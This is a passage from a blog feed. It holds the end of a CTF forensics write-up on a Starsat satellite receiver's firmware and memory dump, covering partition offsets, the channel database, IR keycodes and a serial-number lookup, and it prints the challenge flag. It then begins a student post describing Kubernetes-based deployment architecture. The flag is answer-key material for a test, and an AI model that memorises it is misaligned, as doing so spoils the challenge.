&lt;p&gt;For example:&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/DfscXB4.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;And in Arabic:&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/rdG9k09.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;Using the tool, we determine that the model is SR-2000HD HYPER and the remote control is SR-2000HD HYPER. Hence the brand is Starsat.&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/uWfBYaJ.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;The unpack and repack features are used to decrypt and extract parts of the firmware like the bootloader, maincode, user data if any was supplied by the manufacturer, the menu, the remote, and sometimes a softcam (that’s out of our scope today, maybe in another challenge!). And the repack to insert modified parts and RSA encrypt the whole thing again. Like for instance, we can insert the main menu (including themes and applications) or the remote control unit of a different model or brand and repack it to be used with the device we have, as long as they are using the very same chipset. Well this time, rest assured it is the Hyper remote control and when we talk about key code we mean the IR Infrared key code.&lt;/p&gt;
&lt;p&gt;So the whole memory dump thing and the firmware kind of contain similar stuff at least, one being encrypted and the other not.&lt;/p&gt;
&lt;p&gt;See here, the content of the folder when unpacked.&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/P8IBsRt.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;So why not, giving the dump a try and unpack it as well, we are chasing the user data part anyway. And the tool might very much help. Otherwise I will show how to proceed manually knowing the offsets and lengths found on a forum.&lt;/p&gt;
&lt;h3 id=&#34;finding-the-show&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#finding-the-show&#34;&gt;#&lt;/a&gt; Finding the show&lt;/h3&gt;
&lt;p&gt;As we said before, we can deal with this part either using the tool or manually.&lt;br&gt;
Well, the tool was able to yield this:&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/f1fon6N.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;Very nice, we can see  &lt;code&gt;database.sdx&lt;/code&gt;  file there!&lt;/p&gt;
&lt;p&gt;Well, to proceed manullay you need to know the offsets and lengths beforehand.&lt;br&gt;
This is what we meant:&lt;/p&gt;
&lt;figure class=&#34;highlight plaintext&#34;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;10&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;11&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;12&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;13&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;14&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;15&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;16&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;17&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;18&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;19&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;20&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;21&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;22&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;23&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;24&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;25&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;26&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;27&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;28&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;29&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;30&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;31&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;32&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;33&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;34&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;35&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;36&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;37&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;38&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;39&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;40&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;41&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;42&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;++++++++++++++++++++++++++++++++++++++&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Name : Bootloader.bin&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;SIZE : 128,00 KB&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;CRC : 0x00AF7F6C&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;offset : 0x00000128&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;++++++++++++++++++++++++++++++++++++++&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;++++++++++++++++++++++++++++++++++++++&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Name : maincode.bin&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;SIZE : 3,25 MB&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;CRC : 0x19E8C348&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;offset : 0x00020128&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;++++++++++++++++++++++++++++++++++++++&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;++++++++++++++++++++++++++++++++++++++&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Name : menu.bin&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;SIZE : 1,38 MB&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;CRC : 0x10934143&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;offset : 0x00360128&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;++++++++++++++++++++++++++++++++++++++&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;++++++++++++++++++++++++++++++++++++++&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Name : Database.sdx&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;SIZE : 9,80 KB&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;CRC : 0x00146C71&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;offset : 0x004C0128&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;++++++++++++++++++++++++++++++++++++++&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;++++++++++++++++++++++++++++++++++++++&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Name : softcam.bin&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;SIZE : 42,38 KB&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;CRC : 0x008D5F15&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;offset : 0x004C2860&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;++++++++++++++++++++++++++++++++++++++&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;++++++++++++++++++++++++++++++++++++++&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Name : sattp.bin&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;SIZE : 12,54 KB&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;CRC : 0x00097FDA&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;offset : 0x004CD1E8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;++++++++++++++++++++++++++++++++++++++&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;++++++++++++++++++++++++++++++++++++++&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Name : Padding.bin&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;SIZE : 522,06 KB&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;CRC : 0x040E1F6B&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;offset : 0x004D040C&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;++++++++++++++++++++++++++++++++++++++&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Found here: &lt;span class=&#34;exturl&#34; data-url=&#34;aHR0cHM6Ly93d3cudHVuaXNpYS1zYXQuY29tL2ZvcnVtcy90aHJlYWRzLzMyNDI3NjEvcGFnZS00Nw==&#34;&gt;https://www.tunisia-sat.com/forums/threads/3242761/page-47&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;We know  &lt;code&gt;database.sdx&lt;/code&gt;  holds the user data meaning the channels. sattp is another file that holds the different satellites and their frequencies aka transponders.&lt;/p&gt;
&lt;p&gt;When we open the file in a hex editor, We can’t read any useful information out of it. This means that there should be a tool in place to view and edit the channels for the specific chipset family we are dealing with as the file seems highly compressed.&lt;/p&gt;
&lt;p&gt;Here’s a view from hex editor first.&lt;/p&gt;
&lt;p&gt;Starts off like this&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/7FHWF6K.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;And ends padded with 0xFF&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/xqvWPxc.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;Let’s google a bit…&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/P5bXWY4.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;We got this&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/hVzUWC9.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;When trying to first open the database, we got this error message&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/ASWzJB9.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;And the issue is that the Userdata has a static size as indicated before. As the receiver’s capacity fits a maximum of 6100 channels. So the database file is padded with 0xFF to reach the maximum size. Let’s get rid of the padded data and try again…&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/NUIk82u.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;Now, it’s working like charm, and I already see some familiar TV channels on Astra 1 (19.2 East).&lt;/p&gt;
&lt;p&gt;Let’s expand the favorites section&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/AmkpQPE.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;And there is Sky Sports Main Event, UK-based sports channel that is part of BSkyB or Sky Group, pay-television channel and availble for satellite subsribers via Eurobird 1, Astra 2 (28.2 East). Sky Sports Main Event broadcasts the biggest events of sports in the UK.&lt;/p&gt;
&lt;p&gt;Now, great work to reach this point, but we are not done yet. We need to find the right show at that past date, meaning at 1:07 AM on February the 1st, 2020.&lt;/p&gt;
&lt;p&gt;Well, Sky TV Guide won’t keep such data for more than a week or two, so we need to find another way.&lt;/p&gt;
&lt;p&gt;Guess you know what we mean, what else than the way back machine!&lt;/p&gt;
&lt;p&gt;Head over to &lt;span class=&#34;exturl&#34; data-url=&#34;aHR0cDovL2FyY2hpdmUub3Jn&#34;&gt;archive.org&lt;/span&gt; and submit the link for the Sky TV Guide and try to narrow your search to a date that’s equal or close to the date in question, as shown below!&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/B5scqzJ.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;And that is the first part of the flag:  &lt;code&gt;live_rugby_7&#39;s&lt;/code&gt;  or  &lt;code&gt;live_rugby_7s&lt;/code&gt;&lt;/p&gt;
&lt;h3 id=&#34;finding-the-keycodes&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#finding-the-keycodes&#34;&gt;#&lt;/a&gt; Finding the keycodes&lt;/h3&gt;
&lt;p&gt;We know it is Starsat SR-2000HD Hyper’s remote control, well unless you have the same remote control or probably a remote of the same brand and an Arduino card embedded with an IR receiver, you will need to improvise! Like check online there GitHub repos that keep track of IR key codes for different remotes. Or you can use a forum like &lt;span class=&#34;exturl&#34; data-url=&#34;aHR0cHM6Ly93d3cucmVtb3RlY2VudHJhbC5jb20v&#34;&gt;https://www.remotecentral.com/&lt;/span&gt; to find the key codes for the remote control.&lt;/p&gt;
&lt;p&gt;However for this part, we will use an Android app like IRplus or any alternatives and pick the device in question from the list then head over to check the keys, we will provide screenshots for what we’ve found. Since it is the simplest and fastest way.&lt;/p&gt;
&lt;p&gt;This is the LIRC protcol of Starsat &lt;span class=&#34;exturl&#34; data-url=&#34;aHR0cHM6Ly9saXJjLnNvdXJjZWZvcmdlLm5ldC9yZW1vdGVzL3N0YXJzYXQvMTIw&#34;&gt;https://lirc.sourceforge.net/remotes/starsat/120&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;We are looking for NEC, so we found an app for that.&lt;/p&gt;
&lt;p&gt;&lt;span class=&#34;exturl&#34; data-url=&#34;aHR0cHM6Ly9pcnBsdXMtcmVtb3RlLmdpdGh1Yi5pby8=&#34;&gt;net.binarymode.android.irplus&lt;/span&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Selecting the remote control from the list:&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/3hjuMYS.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;ol start=&#34;2&#34;&gt;
&lt;li&gt;Exporting the remote config and checking the Channel Up arrow and Channel Down arrow&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/lsXXO6K.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;And that is the second part of the flag:  &lt;code&gt;00ff30cf_00ff8877&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;we can make sure that is the correct format using a website like &lt;span class=&#34;exturl&#34; data-url=&#34;aHR0cHM6Ly93d3cueWFtYWhhLmNvbS95cGFiL2lyaGV4X2NvbnZlcnRlci5hc3A=&#34;&gt;https://www.yamaha.com/ypab/irhex_converter.asp&lt;/span&gt;&lt;br&gt;
converting NEC 32-bit to Pronto hex format (RAW HEX) and then to global caché to see the full sendIR command…&lt;/p&gt;
&lt;h3 id=&#34;finding-the-expiration-date&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#finding-the-expiration-date&#34;&gt;#&lt;/a&gt; Finding the expiration date&lt;/h3&gt;
&lt;p&gt;Now for the fun part, if you dig around the web about Starsat 2000 Hyper you will end up with one official built in service, Apollo that offers IPTV as well as VOD Video on Demand.&lt;/p&gt;
&lt;p&gt;And there is an online service to renew and check your current subscription by just providing the serial number.&lt;/p&gt;
&lt;p&gt;&lt;span class=&#34;exturl&#34; data-url=&#34;aHR0cDovL3d3dy5yZW5ld2JveC5uZXQvaW5kZXgucGhw&#34;&gt;www.renewbox.net&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;The serial number in most cases is a long number like consists of maybe more than 10 digits. And it can’t be in the firmware since it is released to the public to update their devices. So it must be within the memory of the device itself.&lt;/p&gt;
&lt;p&gt;Let’s grep that easily!&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/XmWhATI.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;And there it is, the serial number, let’s query the IPTV validity.&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/lTGDuFS.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;And the last part of the flag is  &lt;code&gt;20141105&lt;/code&gt;&lt;/p&gt;
&lt;h3 id=&#34;final-words&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#final-words&#34;&gt;#&lt;/a&gt; Final Words&lt;/h3&gt;
&lt;p&gt;Flag: &lt;strong&gt;Securinets{live_rugby_7s_00ff30cf_00ff8877_20141105}&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;GGs &lt;strong&gt;th3_r0n1ns&lt;/strong&gt; for solving this challenge&lt;/p&gt;
</content>
        <updated>2023-08-06T18:00:00.000Z</updated>
    </entry>
    <entry>
        <id>http://example.com/2023/06/03/Kubernetes/post/</id>
        <title>Streamlined Application Deployemet using Kubernetes</title>
        <link rel="alternate" href="http://example.com/2023/06/03/Kubernetes/post/"/>
        <content type="html">&lt;h1 id=&#34;introduction&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#introduction&#34;&gt;#&lt;/a&gt; Introduction&lt;/h1&gt;
&lt;p&gt;As second-year engineering students, we embarked our academic group project that pushes us beyond our limits. Being self-proclaimed cloud-native and Kubernetes geeks, we decided to venture into an unfamiliar territory with an advanced project. Our goal? To unravel the mysteries of Heroku, Vercel, and On-Render, the leading PaaS solutions! And here is the twist, we were running out of time, and neither ChatGPT nor Google can help us. We are mad, and we actually did it in 4 days! Fellow adventurers, let’s get you to feel the glimpse of what we have been through in just 4 days to build our project codenamed Kli8nt for streamlined application deployments into the Kubernetes realm&lt;/p&gt;
&lt;p&gt;Fueled by the increasing demand for a unified platform that encompasses front-end hosting, backend deployment, and database management, our team leveraged our expertise in DevOps, Kubernetes, and web development to establish a robust and scalable solution that is client-friendly and K8s-able, hence the name Kli8nt. It is our way to design a mechanism that’s a proof-of-concept to the leading PaaS solutions&lt;/p&gt;
&lt;h1 id=&#34;project-details&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#project-details&#34;&gt;#&lt;/a&gt; Project Details  :&lt;/h1&gt;
&lt;h2 id=&#34;high-level-architecture&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#high-level-architecture&#34;&gt;#&lt;/a&gt; High Level Architecture&lt;/h2&gt;
&lt;p&gt;Our system consists of various interconnected components that work together seamlessly. At the front-end, users interact with the system and provide the necessary information for application deployment. The backbone of our system is the backend, which handles authentication, data storage, and serves as the communication hub with the clusters. It establishes a websocket connection to deliver real-time logs to the user. To facilitate efficient communication between the backend and clusters, we rely on RabbitMQ, a messaging system that ensures reliable information exchange. The clusters themselves take charge of the build and deployment operations, guided by custom controllers to ensure efficiency and accuracy. Lastly, Kafka, our robust data streaming platform, stores and streams application logs from the clusters to the user. Together, these components form a cohesive system that enables smooth and efficient application deployment.&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/fEOyFeQ.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;h2 id=&#34;user-interface&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#user-interface&#34;&gt;#&lt;/a&gt; User Interface&lt;/h2&gt;
&lt;p&gt;The User Interface serves as the primary interaction point for developers using the&lt;br&gt;
Kli8nt platform. Designed with simplicity and ease of use in mind, the UI provides&lt;br&gt;
a seamless experience for users to connect to their GitHub accounts, manage their&lt;br&gt;
repository specifications, and initiate deployments. We aim to streamline the&lt;br&gt;
application management process and empower developers to effortlessly deploy&lt;br&gt;
their applications.&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://imgur.com/O5fW0GG.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;h2 id=&#34;user-authentication&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#user-authentication&#34;&gt;#&lt;/a&gt; User Authentication&lt;/h2&gt;
&lt;p&gt;Kli8nt leverages the robust authentication capabilities of GitHub OAuth2 as its primary method for user login and authorization. By utilizing this powerful authentication mechanism, users can grant the platform access to their repositories. With the generated Personal Access Token (PAT) associated with the authenticated user, Kli8nt gains the ability to clone both private and public repositories, utilizing the functionalities provided by the GitHub API. This approach ensures secure and seamless integration with GitHub, allowing users to enjoy a streamlined experience while maintaining the necessary permissions and access controls.&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://imgur.com/KEoSXvr.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;h2 id=&#34;backend-service&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#backend-service&#34;&gt;#&lt;/a&gt; Backend Service&lt;/h2&gt;
&lt;p&gt;The backend service is the backbone of the platform, ensuring efficient functionality by handling user requests, processing deployment tasks, managing logs, and facilitating seamless communication between components. It plays a vital role in request handling and routing, ensuring user requests are directed to the appropriate components for further processing. Additionally, it handles user authentication and authorization, ensuring secure access to the platform. Integration with RabbitMQ allows for the handling and queuing of deployment requests, while task scheduling ensures efficient and ordered processing. The backend service also integrates with GitHub’s Deployment Environment, facilitating synchronization and updates for deployments. Logs are streamed and stored using Kafka, with a backend endpoint responsible for streaming logs back to users for monitoring. Database interaction with PostgreSQL allows for data storage and retrieval related to user configurations, deployment records, and other relevant information, ensuring data consistency and integrity through GORM. Overall, the backend service acts as a crucial orchestrator, ensuring the smooth operation and effective management of the platform’s core functionalities.&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/WyYpyTw.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;h2 id=&#34;the-messaging-queue-system&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#the-messaging-queue-system&#34;&gt;#&lt;/a&gt; The Messaging Queue System&lt;/h2&gt;
&lt;p&gt;To manage and queue deployment requests, we’ve integrated RabbitMQ. Simply put, it is a software where queues are defined, to which applications connect in order to transfer messages. For when a deployment request is received, the backend enqueues the task into a BUILD queue to the Kubernetes BUILD Operator. This ensures that each task is processed in the right order. The Kubernetes DEPLOY Operator in turn enqueus deployment results back here though the INFORM queue.&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/zNOA4Lz.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;h2 id=&#34;the-build-and-deploy-kubernetes-custom-controller&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#the-build-and-deploy-kubernetes-custom-controller&#34;&gt;#&lt;/a&gt; The Build and Deploy Kubernetes Custom Controller&lt;/h2&gt;
&lt;p&gt;The clusters are responsible for the build and deployment operations. These processes are managed by custom controllers, ensuring efficiency and accuracy in deploying applications.&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/kTZmlxJ.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;h2 id=&#34;the-build-kubernetes-custom-controller&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#the-build-kubernetes-custom-controller&#34;&gt;#&lt;/a&gt; The Build Kubernetes Custom Controller&lt;/h2&gt;
&lt;p&gt;The build controller plays a critical role in initiating the build process for each application. It acts as a listener for the queue served by RabbitMQ, enabling it to initiate the build process. When a new application is added to the queue, the controller creates an isolated environment specifically for that application. Within this isolated environment, it launches a dedicated build process. This process involves tasks such as cloning the repository and generating a Dockerfile based on the application’s stack and programming language, starting the Kaniko process to initiate the build, which includes compiling the source code, resolving dependencies, and creating a container image then pushing the resulting container image to a private registry.&lt;/p&gt;
&lt;p&gt;After completing the build and push process, the isolated environment is terminated and deleted, in addition, the controller publishes a message to the deployment queue served by RabbitMQ. This queue holds the applications that are scheduled to be deployed by the deploy controller. This ensures a clean and efficient workflow, as each build process operates in its isolated context. By leveraging the build controller’s capabilities, applications can be built and prepared for deployment without interference or conflicts with other ongoing builds&lt;/p&gt;
&lt;h2 id=&#34;the-deploy-kubernetes-custom-controller&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#the-deploy-kubernetes-custom-controller&#34;&gt;#&lt;/a&gt; The Deploy Kubernetes Custom Controller&lt;/h2&gt;
&lt;p&gt;After the build process concludes and the build controller sends an element to the queue, the deploy controller consumes the queue and initiates the deployment process. This involves creating a deployment object that includes a pod. The application’s Docker image is then pulled and run within this pod. Simultaneously, a cluster IP service is created and associated with the deployment, enabling internal communication within the cluster.&lt;/p&gt;
&lt;p&gt;The deploy controller takes charge of exposing the application externally and adding a TLS/SSL certificate. It achieves this by adding a route rule for the service within the ingress configuration. Additionally, it adds TLS/SSL configuration to the Ingress, allowing the application to be accessed securely via HTTPS. By utilizing Nginx Ingress, the controller ensures that the application is reachable and accessible with the desired HTTPS protocol and has a specific subdomain for the application.&lt;/p&gt;
&lt;p&gt;Once the application is successfully deployed and exposed to the TLS certificate, the deploy controller notifies the backend server that the application is now ready for user access. This communication informs the backend server that the newly deployed application is available and can be utilized by users.&lt;/p&gt;
&lt;h2 id=&#34;the-log-streaming-controller&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#the-log-streaming-controller&#34;&gt;#&lt;/a&gt; The Log Streaming Controller&lt;/h2&gt;
&lt;p&gt;Another important aspect in such provided service, is that the user would like to have a vision over his application while and after its being prepared and sent to production. To deliver such a feature, we have implemented another controller in go, that’s responsible for listening to Pod’s lifecycle events, made possible thanks to the Shared Informer feature in the Kubernetes API which is a local cache kind of resource made to be consumed. Whenever a new Deployment is up and running, grab its logs and stream them real time to another environment to be stored. This environment being Apache Kafka, an open source distributed message streaming that’s suited for high performance data pipelines. Our Kafka is running in its own managed cluster at Confluent, a KaaS provider with additional cool features that we liked while using them (like a nice user-friendly dashboard, a built-in REST API, etc…). Kafka is going to stream the logs, each application in its own kafka topic or event, directly to the backend, and store them for future requests -so you don’t really have to be there at the right time, whenever you request them you’ll get them and if you are there already you get them live.&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/UomqhLd.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;h1 id=&#34;the-conclusion&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#the-conclusion&#34;&gt;#&lt;/a&gt; The conclusion&lt;/h1&gt;
&lt;p&gt;Our end-of-year project theoretically proposes and empirically validate a system design able to streamline the process of deploying any mciroservice application living in Github to Kubernetes on Cloud. This project is our gateway to our graduation projects as well as internship opportunities this summer, and would be a great addition to our professional journeys&lt;/p&gt;
&lt;h1 id=&#34;meet-the-team&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#meet-the-team&#34;&gt;#&lt;/a&gt; Meet the Team&lt;/h1&gt;
&lt;p&gt;Along with the immense support from our supervisor Mr. Bassem Ben Saleh and his esteemed jury.&lt;br&gt;
We would like to extend a heartfelt thank you to our families and close ones for their support and encouragement during late nights and long hours of work.&lt;/p&gt;
&lt;div class=&#34;links&#34;&gt;&lt;div class=&#34;item&#34; title=&#34;Mohamed Rafraf - Raf²&#34; style=&#34;--block-color:#2296fd;&#34;&gt;&lt;span class=&#34;exturl image&#34; data-url=&#34;aHR0cHM6Ly9tb2hhbWVkLXJhZnJhZi5naXRodWIuaW8=&#34; data-background-image=&#34;https://media.licdn.com/dms/image/C4D03AQGoi9OLQy5yfg/profile-displayphoto-shrink_800_800/0/1635769397295?e=1691020800&amp;v=beta&amp;t=IOYj31PodnHo-vWlY3lHvfLTCAzBeGPclWqCkdQl1bE&#34;&gt;&lt;/span&gt;
          &lt;div class=&#34;info&#34;&gt;
          &lt;span class=&#34;exturl title&#34; data-url=&#34;aHR0cHM6Ly9tb2hhbWVkLXJhZnJhZi5naXRodWIuaW8=&#34;&gt;Mohamed Rafraf - Raf²&lt;/span&gt;
          &lt;p class=&#34;desc&#34;&gt;Kubernetes Engineer&lt;/p&gt;
